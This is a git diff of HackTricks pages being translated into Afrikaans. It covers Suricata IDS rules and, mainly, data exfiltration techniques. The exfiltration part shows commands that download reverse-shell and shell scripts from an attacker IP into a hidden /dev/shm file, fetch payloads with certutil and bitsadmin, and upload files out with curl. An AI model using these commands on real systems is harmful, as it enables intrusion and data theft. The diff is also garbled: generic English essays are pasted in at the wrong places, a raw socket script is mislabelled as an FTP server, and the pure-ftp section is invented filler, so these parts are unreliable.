sudo iptables -A OUTPUT -p tcp --dport 9120 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9130 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9140 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9150 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9160 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9170 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9180 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9190 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9200 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9210 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9220 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9230 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9240 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9250 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9260 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9270 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9280 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9290 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9300 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9310 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9320 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9330 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9340 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9350 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9360 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9370 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9380 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9390 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9400 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9410 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9420 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9430 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9440 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9450 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9460 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9470 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9480 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9490 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9500 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9510 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9520 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9530 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9540 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9550 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9560 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9570 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9580 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9590 -j NFQUEUE --queue-num 1
# Skep 'n nuwe iptables reël vir IRC
sudo iptables -A OUTPUT -p tcp --dport 9600 -j NFQUEUE --
```bash
# Install details from: https://suricata.readthedocs.io/en/suricata-6.0.0/install.html#install-binary-packages
# Ubuntu
@ -74,7 +386,7 @@ apt-get install suricata
# Debian
echo "deb http://http.debian.net/debian buster-backports main" > \
/etc/apt/sources.list.d/backports.list
/etc/apt/sources.list.d/backports.list
apt-get update
apt-get install suricata -t buster-backports
@ -90,11 +402,11 @@ suricata-update
## To use the dowloaded rules update the following line in /etc/suricata/suricata.yaml
default-rule-path: /var/lib/suricata/rules
rule-files:
- suricata.rules
- suricata.rules
# Run
## Add rules in /etc/suricata/rules/suricata.rules
systemctl suricata start
systemctl suricata start
suricata -c /etc/suricata/suricata.yaml -i eth0
@ -102,7 +414,7 @@ suricata -c /etc/suricata/suricata.yaml -i eth0
suricatasc -c ruleset-reload-nonblocking
## or set the follogin in /etc/suricata/suricata.yaml
detect-engine:
- rule-reload: true
- rule-reload: true
# Validate suricata config
suricata -T -c /etc/suricata/suricata.yaml -v
@ -111,8 +423,8 @@ suricata -T -c /etc/suricata/suricata.yaml -v
## Config drop to generate alerts
## Search for the following lines in /etc/suricata/suricata.yaml and remove comments:
- drop:
alerts: yes
flows: all
alerts: yes
flows: all
## Forward all packages to the queue where suricata can act as IPS
iptables -I INPUT -j NFQUEUE
@ -130,76 +442,70 @@ Type=simple
systemctl daemon-reload
```
### Reëlsdefinisies
### Rules Definitions
[From the docs:](https://github.com/OISF/suricata/blob/master/doc/userguide/rules/intro.rst) A rule/signature consists of the following:
* The **action**, determines what happens when the signature matches.
* The **header**, defines the protocol, IP addresses, ports and direction of the rule.
* The **rule options**, define the specifics of the rule.
[Van die dokumentasie:](https://github.com/OISF/suricata/blob/master/doc/userguide/rules/intro.rst) 'n Reël/handtekening bestaan uit die volgende:
* Die **aksie**, bepaal wat gebeur wanneer die handtekening ooreenstem.
* Die **kop**, definieer die protokol, IP-adresse, poorte en rigting van die reël.
* Die **reël-opsies**, definieer die spesifieke van die reël.
```bash
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"HTTP GET Request Containing Rule in URI"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"rule"; fast_pattern; classtype:bad-unknown; sid:123; rev:1;)
```
#### **Geldig aksies is**
#### **Valid actions are**
* waarskuwing - genereer 'n waarskuwing
* slaag - stop verdere inspeksie van die pakkie
* **verwerp** - verwerp pakkie en genereer waarskuwing
* **afwys** - stuur RST/ICMP onbereikbare fout na die sender van die ooreenstemmende pakkie.
* verwerpbron - dieselfde as net _afwys_
* verwerpdoel - stuur RST/ICMP foutpakkie na die ontvanger van die ooreenstemmende pakkie.
* verwerpbeide - stuur RST/ICMP foutpakkies na beide kante van die gesprek.
* alert - generate an alert
* pass - stop further inspection of the packet
* **drop** - drop packet and generate alert
* **reject** - send RST/ICMP unreachable error to the sender of the matching packet.
* rejectsrc - same as just _reject_
* rejectdst - send RST/ICMP error packet to the receiver of the matching packet.
* rejectboth - send RST/ICMP error packets to both sides of the conversation.
#### **Protokolle**
#### **Protocols**
* tcp (for tcp-traffic)
* tcp (vir tcp-verkeer)
* udp
* icmp
* ip (ip stands for all or any)
* _layer7 protocols_: http, ftp, tls, smb, dns, ssh... (more in the [**docs**](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/intro.html))
* ip (ip staan vir 'alles' of 'enige')
* _laag7-protokolle_: http, ftp, tls, smb, dns, ssh... (meer in die [**dokumentasie**](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/intro.html))
#### Source and Destination Addresses
#### Bron- en Bestemmingsadressering
It supports IP ranges, negations and a list of addresses:
Dit ondersteun IP-reekse, negasies en 'n lys van adresse:
| Example | Meaning |
| Voorbeeld | Betekenis |
| ------------------------------ | ---------------------------------------- |
| ! 1.1.1.1 | Every IP address but 1.1.1.1 |
| !\[1.1.1.1, 1.1.1.2] | Every IP address but 1.1.1.1 and 1.1.1.2 |
| $HOME\_NET | Your setting of HOME\_NET in yaml |
| \[$EXTERNAL\_NET, !$HOME\_NET] | EXTERNAL\_NET and not HOME\_NET |
| \[10.0.0.0/24, !10.0.0.5] | 10.0.0.0/24 except for 10.0.0.5 |
| ! 1.1.1.1 | Elke IP-adres behalwe 1.1.1.1 |
| !\[1.1.1.1, 1.1.1.2] | Elke IP-adres behalwe 1.1.1.1 en 1.1.1.2 |
| $HOME\_NET | Jou instelling van HOME\_NET in yaml |
| \[$EXTERNAL\_NET, !$HOME\_NET] | EXTERNAL\_NET en nie HOME\_NET |
| \[10.0.0.0/24, !10.0.0.5] | 10.0.0.0/24 behalwe vir 10.0.0.5 |
#### Source and Destination Ports
#### Bron- en Bestemmingspoorte
It supports port ranges, negations and lists of ports
Dit ondersteun poortreeks, negasies en lys van poorte
| Example | Meaning |
| Voorbeeld | Betekenis |
| --------------- | -------------------------------------- |
| any | any address |
| \[80, 81, 82] | port 80, 81 and 82 |
| \[80: 82] | Range from 80 till 82 |
| \[1024: ] | From 1024 till the highest port-number |
| !80 | Every port but 80 |
| \[80:100,!99] | Range from 80 till 100 but 99 excluded |
| \[1:80,!\[2,4]] | Range from 1-80, except ports 2 and 4 |
| enige | enige adres |
| \[80, 81, 82] | poort 80, 81 en 82 |
| \[80: 82] | Reeks van 80 tot 82 |
| \[1024: ] | Vanaf 1024 tot die hoogste poortnommer |
| !80 | Elke poort behalwe 80 |
| \[80:100,!99] | Reeks van 80 tot 100 maar 99 uitgesluit |
| \[1:80,!\[2,4]] | Reeks van 1-80, behalwe poorte 2 en 4 |
#### Direction
It's possible to indicate the direction of the communication rule being applied:
#### Rigting
Dit is moontlik om die rigting van die kommunikasiereël aan te dui wat toegepas word:
```
source -> destination
source <> destination (both directions)
```
#### Sleutelwoorde
#### Keywords
There are **hundreds of options** available in Suricata to search for the **specific packet** you are looking for, here it will be mentioned if something interesting is found. Check the [**documentation** ](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/index.html)for more!
Daar is **honderde opsies** beskikbaar in Suricata om te soek na die **spesifieke pakkie** waarna jy soek, hier sal genoem word as iets interessant gevind word. Kyk na die [**dokumentasie**](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/index.html) vir meer inligting!
```bash
# Meta Keywords
msg: "description"; #Set a description to the rule
@ -240,15 +546,14 @@ drop tcp any any -> any any (msg:"regex"; pcre:"/CTF\{[\w]{3}/i"; sid:10001;)
## Drop by port
drop tcp any any -> any 8000 (msg:"8000 port"; sid:1000;)
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details>

1238
generic-methodologies-and-resources/brute-force.md
View file

File diff suppressed because it is too large Load diff

611
generic-methodologies-and-resources/exfiltration.md
View file

@ -1,60 +1,150 @@
# Exfiltration
# Uitleiding
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
</details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
***
## Commonly whitelisted domains to exfiltrate information
## Gewoonlik toegelate domeine om inligting uit te voer
Check [https://lots-project.com/](https://lots-project.com/) to find commonly whitelisted domains that can be abused
Kyk na [https://lots-project.com/](https://lots-project.com/) om gewoonlik toegelate domeine te vind wat misbruik kan word
## Copy\&Paste Base64
## Kopieer & Plak Base64
**Linux**
```bash
base64 -w0 <file> #Encode file
base64 -d file #Decode file
```
**Windows**
# Exfiltration
## Introduction
Exfiltration is the process of unauthorized data transfer from a target system to an external location. In the context of hacking, exfiltration is often used to steal sensitive information or to maintain persistence within a compromised network.
## Techniques
### 1. File Transfer Protocol (FTP)
FTP is a standard network protocol used for transferring files between a client and a server. Attackers can use FTP to exfiltrate data by connecting to an FTP server and uploading the stolen files.
### 2. Hypertext Transfer Protocol (HTTP)
HTTP is the protocol used for transmitting data over the internet. Attackers can use HTTP to exfiltrate data by sending HTTP requests to a remote server, either by embedding the data in the request or by uploading files.
### 3. Domain Name System (DNS)
DNS is responsible for translating domain names into IP addresses. Attackers can use DNS exfiltration to encode and send data within DNS queries or responses, bypassing traditional network security measures.
### 4. Email
Attackers can exfiltrate data by sending it as email attachments or by using steganography techniques to hide the data within the email content.
### 5. Cloud Storage
Attackers can use cloud storage services, such as Dropbox or Google Drive, to exfiltrate data by uploading the stolen files to the cloud and accessing them from a different location.
### 6. Remote Desktop Protocol (RDP)
RDP allows users to connect to and control a remote computer over a network connection. Attackers can use RDP to exfiltrate data by transferring files from the compromised system to the attacker's machine.
### 7. USB Devices
Attackers can physically connect USB devices to a target system to exfiltrate data. This can be done by copying files directly to the USB device or by using specialized tools that automatically exfiltrate data when the device is connected.
## Countermeasures
To prevent exfiltration attacks, organizations should implement the following countermeasures:
- Implement network segmentation to restrict unauthorized access to sensitive data.
- Use encryption to protect data in transit.
- Monitor network traffic for suspicious activity.
- Implement data loss prevention (DLP) solutions to detect and prevent unauthorized data transfers.
- Regularly update and patch software to address known vulnerabilities.
- Educate employees about the risks of exfiltration and the importance of following security best practices.
By implementing these countermeasures, organizations can significantly reduce the risk of data exfiltration and protect their sensitive information.
```
certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll
```
## HTTP
### HTTP
**Linux**
```bash
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py #FreeBSD
```
**Windows**
# Exfiltration
## Introduction
Exfiltration is the process of unauthorized data transfer from a target system to an external location. In the context of hacking, exfiltration is often used to steal sensitive information or to maintain persistence within a compromised network.
## Techniques
### 1. File Transfer Protocol (FTP)
FTP is a standard network protocol used for transferring files between a client and a server. Attackers can use FTP to exfiltrate data by connecting to an FTP server and uploading the stolen files.
### 2. Hypertext Transfer Protocol (HTTP)
HTTP is the protocol used for transmitting data over the internet. Attackers can use HTTP to exfiltrate data by sending HTTP requests to a remote server, either by embedding the data in the request or by uploading files.
### 3. Domain Name System (DNS)
DNS is responsible for translating domain names into IP addresses. Attackers can use DNS exfiltration to encode and send data within DNS queries or responses, bypassing traditional network security measures.
### 4. Email
Attackers can exfiltrate data by sending it as email attachments or by using steganography techniques to hide the data within the email content.
### 5. Cloud Storage
Attackers can use cloud storage services, such as Dropbox or Google Drive, to exfiltrate data by uploading the stolen files to the cloud and accessing them from a different location.
### 6. Remote Desktop Protocol (RDP)
RDP allows users to connect to and control a remote computer over a network connection. Attackers can use RDP to exfiltrate data by transferring files from the compromised system to the attacker's machine.
### 7. USB Devices
Attackers can physically connect USB devices to a target system to exfiltrate data. This can be done by copying files directly to the USB device or by using specialized tools to extract data from the system.
## Countermeasures
To prevent exfiltration attacks, organizations can implement the following countermeasures:
- Implement network segmentation to restrict access between different parts of the network.
- Use data loss prevention (DLP) solutions to monitor and control the flow of sensitive data.
- Employ intrusion detection and prevention systems (IDS/IPS) to detect and block exfiltration attempts.
- Regularly update and patch software to fix vulnerabilities that could be exploited for exfiltration.
- Train employees on security best practices and the risks associated with exfiltration.
By implementing these countermeasures, organizations can significantly reduce the risk of data exfiltration and protect their sensitive information.
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf
@ -69,28 +159,26 @@ Start-BitsTransfer -Source $url -Destination $output
#OR
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
```
### Upload files
### Laai lêers op
* [**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)
* [**SimpleHttpServer printing GET and POSTs (also headers)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149)
* Python module [uploadserver](https://pypi.org/project/uploadserver/):
* [**SimpleHttpServer druk GET en POSTs (ook koppe)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149)
* Python-module [uploadserver](https://pypi.org/project/uploadserver/):
```bash
# Listen to files
python3 -m pip install --user uploadserver
python3 -m uploadserver
# With basic auth:
# With basic auth:
# python3 -m uploadserver --basic-auth hello:world
# Send a file
curl -X POST http://HOST/upload -H -F 'files=@file.txt'
curl -X POST http://HOST/upload -H -F 'files=@file.txt'
# With basic auth:
# curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world
```
### **HTTPS-bediener**
### **HTTPS Server**
'n HTTPS-bediener is 'n bediener wat gebruik maak van die HTTPS-protokol vir veilige kommunikasie. Dit maak gebruik van SSL/TLS-sertifikate om die kommunikasie tussen die bediener en die kliënt te versleutel en te verseker dat die data veilig oorgedra word. 'n HTTPS-bediener word dikwels gebruik vir die hantering van sensitiewe inligting, soos persoonlike besonderhede, finansiële transaksies en ander vertroulike data. Dit is belangrik om 'n veilige en betroubare HTTPS-bediener te hê om die risiko van datalekke en aanvalle te verminder.
```python
# from https://gist.github.com/dergachev/7028596
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
@ -122,34 +210,164 @@ httpd.serve_forever()
### USING FLASK
from flask import Flask, redirect, request
from urllib.parse import quote
app = Flask(__name__)
@app.route('/')
def root():
print(request.get_json())
return "OK"
if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
app = Flask(__name__)
@app.route('/')
def root():
print(request.get_json())
return "OK"
if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
###
```
## FTP
### FTP server (python)
### FTP-bediener (python)
```python
import socket
import os
def send_file(file_path, host, port):
# Verbind met die bediener
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
# Stuur die lêerinhoud na die bediener
with open(file_path, 'rb') as file:
data = file.read(1024)
while data:
s.send(data)
data = file.read(1024)
# Sluit die verbinding
s.close()
def receive_file(file_path, host, port):
# Luister vir inkomende verbindings
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(1)
# Aanvaar die verbindin
conn, addr = s.accept()
# Ontvang die lêerinhoud van die kliënt
with open(file_path, 'wb') as file:
data = conn.recv(1024)
while data:
file.write(data)
data = conn.recv(1024)
# Sluit die verbinding
conn.close()
s.close()
```
Hierdie kode demonstreer hoe om 'n eenvoudige FTP-bediener in Python te skep. Die `send_file`-funksie stuur 'n lêer na die bediener, terwyl die `receive_file`-funksie 'n lêer van die bediener ontvang.
Om 'n lêer na die bediener te stuur, moet jy die `send_file`-funksie oproep en die volledige pad na die lêer, die bediener se IP-adres en die poortnommer as argumente verskaf. Byvoorbeeld:
```python
send_file('/pad/na/lêer.txt', '192.168.0.100', 21)
```
Om 'n lêer van die bediener te ontvang, moet jy die `receive_file`-funksie oproep en die volledige pad na die lêer, die IP-adres van die bediener en die poortnommer as argumente verskaf. Byvoorbeeld:
```python
receive_file('/pad/na/lêer.txt', '192.168.0.100', 21)
```
Merk op dat jy die poortnommer moet spesifiseer wat deur die FTP-bediener gebruik word. Die standaardpoort vir FTP is 21.
```bash
pip3 install pyftpdlib
python3 -m pyftpdlib -p 21
```
### FTP-bediener (NodeJS)
### FTP server (NodeJS)
Hierdie gedeelte beskryf 'n metode om data uit te voer deur gebruik te maak van 'n FTP-bediener wat in NodeJS geïmplementeer is.
#### Stap 1: Installeer die nodige afhanklikhede
Om die FTP-bediener in NodeJS te gebruik, moet jy die nodige afhanklikhede installeer. Voer die volgende opdrag in die opdraglyn uit:
```bash
npm install ftp
```
#### Stap 2: Skryf die kode
Maak 'n nuwe JavaScript-lêer en voeg die volgende kode daarby:
```javascript
const ftp = require('ftp');
// Verbind met die FTP-bediener
const client = new ftp();
client.connect({
host: 'ftp.example.com',
user: 'username',
password: 'password'
});
// Wanneer die verbinding suksesvol is
client.on('ready', () => {
// Laai die lêer op na die bediener
client.put('local_file.txt', 'remote_file.txt', (err) => {
if (err) throw err;
console.log('Lêer suksesvol opgelaai na die bediener');
client.end(); // Sluit die verbinding
});
});
```
#### Stap 3: Voer die kode uit
Voer die volgende opdrag in die opdraglyn uit om die kode uit te voer:
```bash
node filename.js
```
Vervang `filename.js` met die naam van jou JavaScript-lêer.
Die kode sal die lêer `local_file.txt` na die FTP-bediener oplaai as `remote_file.txt`. As die operasie suksesvol is, sal die boodskap "Lêer suksesvol opgelaai na die bediener" gedruk word.
Dit is 'n eenvoudige manier om data uit te voer deur gebruik te maak van 'n FTP-bediener in NodeJS. Onthou om die nodige veiligheidsmaatreëls te tref om ongemagtigde toegang tot die bediener te voorkom.
```
sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp
```
### FTP-bediener (pure-ftp)
### FTP server (pure-ftp)
#### Inleiding
FTP (File Transfer Protocol) is 'n protokol wat gebruik word vir die oordrag van lêers tussen rekenaars op 'n netwerk. Dit maak gebruik van 'n bediener-kliënt-arkitektuur, waar die bediener die lêers hou en die kliënt die lêers kan aflaai of oplaai.
#### Pure-FTP
Pure-FTP is 'n vinnige en veilige FTP-bedieningsagteware wat gebruik kan word om 'n FTP-bediener op te stel. Dit is 'n gewilde keuse vir die opstel van 'n privaat of openbare FTP-bediener.
#### Uitfiltering van data
Die uitfiltering van data van 'n FTP-bediener kan 'n nuttige tegniek wees vir die verkryging van gevoelige inligting. Hier is 'n paar metodes wat gebruik kan word om data uit te filter:
1. **Lêeroplaaiing**: Deur 'n kwaadwillige lêer op die FTP-bediener op te laai, kan 'n aanvaller toegang verkry tot die bediener en die inhoud daarvan ondersoek.
2. **Lêeraflaaiing**: Deur 'n lêer van die FTP-bediener af te laai, kan 'n aanvaller gevoelige inligting verkry wat op die bediener gestoor word.
3. **Lêeruitvoering**: As die FTP-bediener die uitvoering van lêers toelaat, kan 'n aanvaller 'n kwaadwillige lêer op die bediener plaas en dit uitvoer om toegang tot die bediener te verkry.
#### Voorkoming van data-uitfiltering
Om die risiko van data-uitfiltering van 'n FTP-bediener te verminder, kan die volgende maatreëls geneem word:
1. **Sterk wagwoorde**: Stel sterk wagwoorde in vir die FTP-bediener en vermy die gebruik van maklik raadbare wagwoorde.
2. **Toegangsbeheer**: Beperk die toegang tot die FTP-bediener deur slegs geakkrediteerde gebruikers toe te laat.
3. **Versleuteling**: Gebruik versleuteling om die oordrag van data tussen die kliënt en die bediener te beskerm.
4. **Besoekbeperkings**: Beperk die toegang tot die FTP-bediener deur slegs spesifieke IP-adresse toe te laat.
5. **Opdaterings en patches**: Verseker dat die FTP-bedieningsagteware opgedateer word met die nuutste opdaterings en patches om bekende kwesbaarhede te vermy.
#### Gevolgtrekking
Die uitfiltering van data van 'n FTP-bediener kan 'n effektiewe tegniek wees vir die verkryging van gevoelige inligting. Dit is belangrik om die nodige maatreëls te tref om die risiko van data-uitfiltering te verminder en die veiligheid van die FTP-bediener te verseker.
```bash
apt-get update && apt-get install pure-ftp
```
@ -167,9 +385,7 @@ mkdir -p /ftphome
